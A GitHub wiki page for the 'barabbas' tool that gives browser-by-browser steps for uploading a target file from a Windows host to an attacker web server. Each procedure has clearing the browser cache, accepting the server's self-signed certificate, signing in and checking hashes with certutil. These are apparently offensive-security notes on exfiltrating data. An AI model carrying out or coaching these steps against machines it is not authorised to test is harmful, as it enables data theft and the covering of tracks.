UL_ _OSA_ _Web_Browsers - lighthouseitsecurity/barabbas GitHub Wiki
OVERVIEW:
- Mozilla Firefox (HTTP; HTTPS)
- Google Chrome (HTTP; HTTPS)
- Microsoft Edge (HTTP; HTTPS)
NOTES:
- documented this chapter for the sake of coverage and consistency
- documented only the process for HTTPS
- all steps related to HTTP contained within HTTPS
- also covering authentication (optional step)
- for the sake of brevity, documenting each process for Windows OS only
- process for Linux OS has minor (self-explanatory) differences
- using GUI clients preferred over using CLI clients for file transfer
- faster
- more reliable
https://www.mozilla.org/en-US/firefox/browsers/
TESTED OS: Windows 10 (22H2)
1. clear web browser's cache
(Ctrl+Shift+Del)
Time range to clear: ➔ (select) Everything
(mark all checkboxes)
Clear Now
2. navigate to attacker web server
3. accept self-signed X.509 certificate
Advanced... ➔ Accept the Risk and Continue
4. [optional] provide credentials
Username ➔ (provide username from barabbas output)
Password ➔ (provide password from barabbas output)
Sign in
5. upload file
Browse... ➔ (select target file) ➔ Open
Upload
NOTE: also possible to drag and drop the target file to the Browse... button, instead
6. [optional] validate outcome (compare MD5 hashes)
certutil.exe -hashfile testfile_200MB md5
(confirm resulting value equal to value displayed in "File Upload Status" page)
https://www.google.com/chrome/index.html
TESTED ON: Windows 10 (22H2)
1. clear web browser's cache
(Ctrl+Shift+Del)
[tab] Advanced
Time range ➔ (select) All time
(mark all checkboxes)
Clear data
2. navigate to attacker web server
3. accept self-signed X.509 certificate
Advanced ➔ Proceed to (target) (unsafe)
4. [optional] provide credentials
Username ➔ (provide username from barabbas output)
Password ➔ (provide password from barabbas output)
Sign in
5. upload file
Choose File ➔ (select target file) ➔ Open
Upload
NOTE: also possible to drag and drop the target file to the Browse... button, instead
6. [optional] validate outcome (compare MD5 hashes)
certutil.exe -hashfile testfile_200MB md5
(confirm resulting value equal to value displayed in "File Upload Status" page)
https://www.microsoft.com/en-us/edge
TESTED ON: Windows 10 (22H2)
1. clear web browser's cache
(Ctrl+Shift+Del)
Time range ➔ (select) All time
(mark all checkboxes)
Clear now
2. navigate to attacker web server
3. accept self-signed X.509 certificate
Advanced ➔ Continue to (target) (unsafe)
4. [optional] provide credentials
Username ➔ (provide username from barabbas output)
Password ➔ (provide password from barabbas output)
Sign in
5. upload file
Choose File ➔ (select target file) ➔ Open
Upload
NOTE: also possible to drag and drop the target file to the Browse... button, instead
6. [optional] validate outcome (compare MD5 hashes)
certutil.exe -hashfile testfile_200MB md5
(confirm resulting value equal to value displayed in "File Upload Status" page)
